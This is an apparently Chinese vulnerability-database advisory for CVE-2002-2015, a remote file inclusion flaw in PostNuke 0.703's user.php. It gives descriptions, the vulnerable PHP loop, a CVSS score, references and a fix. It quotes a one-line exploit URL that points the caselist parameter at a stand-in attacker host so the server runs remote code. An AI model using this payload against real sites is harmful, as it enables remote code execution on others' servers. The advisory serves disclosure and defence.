CVE-2002-2015
CVSS7.5
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:06
NMCOE    

[原文]PHP file inclusion vulnerability in user.php in PostNuke 0.703 allows remote attackers to include arbitrary files and possibly execute code via the caselist parameter.


[CNNVD]PostNuke caselist远程模块包含漏洞(CNNVD-200212-616)

        
        PostNuke是一款由PHP-NUKE项目组维护和开发的内容管理系统,由PHP实现,运行在多种Linux和Unix系统下,也可运行在Microsoft Windows操作系统下。
        PostNuke的user.php脚本上存在漏洞,远程攻击者可以通过提交包含远程主机上的脚本代码进行攻击。
        攻击者可以通过user.php指定模块为包含远程攻击者控制主机下建立的任意文件,导致远程主机上的任意代码将在系统上执行。问题存在于user.php的第107行,用户可以追加任意值到$caselist变量:
        foreach ($caselist as $k=>$v)
        {
         $ModName = $v['module'];
         include "$v[path]/$k";
        }
        $caselist = array();
        攻击者可能利用此漏洞以httpd的权限在目标系统执行任意命令。
        能否成功利用此漏洞依靠主机系统上的php配置,如果php.ini中的'all_url_fopen'选项被设置成'off',此攻击将失败。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2015
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2015
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-616
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/8699.php
(PATCH)  XF  postnuke-caselist-include-modules(8699)
http://www.securityfocus.com/bid/4381
(UNKNOWN)  BID  4381
http://archives.neohapsis.com/archives/bugtraq/2002-03/0345.html
(UNKNOWN)  BUGTRAQ  20020327 postnuke v 0.7.0.3 remote command execution

- 漏洞信息

PostNuke caselist远程模块包含漏洞
高危 输入验证
2002-12-31 00:00:00 2006-04-07 00:00:00
远程  
        
        PostNuke是一款由PHP-NUKE项目组维护和开发的内容管理系统,由PHP实现,运行在多种Linux和Unix系统下,也可运行在Microsoft Windows操作系统下。
        PostNuke的user.php脚本上存在漏洞,远程攻击者可以通过提交包含远程主机上的脚本代码进行攻击。
        攻击者可以通过user.php指定模块为包含远程攻击者控制主机下建立的任意文件,导致远程主机上的任意代码将在系统上执行。问题存在于user.php的第107行,用户可以追加任意值到$caselist变量:
        foreach ($caselist as $k=>$v)
        {
         $ModName = $v['module'];
         include "$v[path]/$k";
        }
        $caselist = array();
        攻击者可能利用此漏洞以httpd的权限在目标系统执行任意命令。
        能否成功利用此漏洞依靠主机系统上的php配置,如果php.ini中的'all_url_fopen'选项被设置成'off',此攻击将失败。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在php.ini中设置'all_url_fopen'选项为'off'。
        厂商补丁:
        PostNuke
        --------
        PostNuke v.71不存在此漏洞,请下载使用:
        
        http://www.postnuke.com/

- 漏洞信息 (21357)

PostNuke 0.703 caselist Arbitrary Module Include Vulnerability (EDBID:21357)
php webapps
2002-03-28 Verified
0 pokleyzz sakamaniaka
N/A [点击下载]
source: http://www.securityfocus.com/bid/4381/info

PostNuke is a content management system originally forked from the PHP-Nuke project. It is implemented in PHP, and available for Windows, Linux and other Unix based systems.

A vulnerability has been reported in some versions of PostNuke. Reportedly, it is possible to force the script user.php to include arbitrary modules. These files may be hosted remotely and contain arbitrary code, which will then be executed by the vulnerable system.

Other versions of PostNuke may share this vulnerability. This has not, however, been confirmed.

http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host 		

- 漏洞信息

5511
PostNuke user.php caselist Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified, Coordinated Disclosure

- 漏洞描述

PostNuke contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'user.php' script not properly sanitizing user input supplied to the 'caselist' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

- 时间线

2002-03-27 Unknow
2002-03-27 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站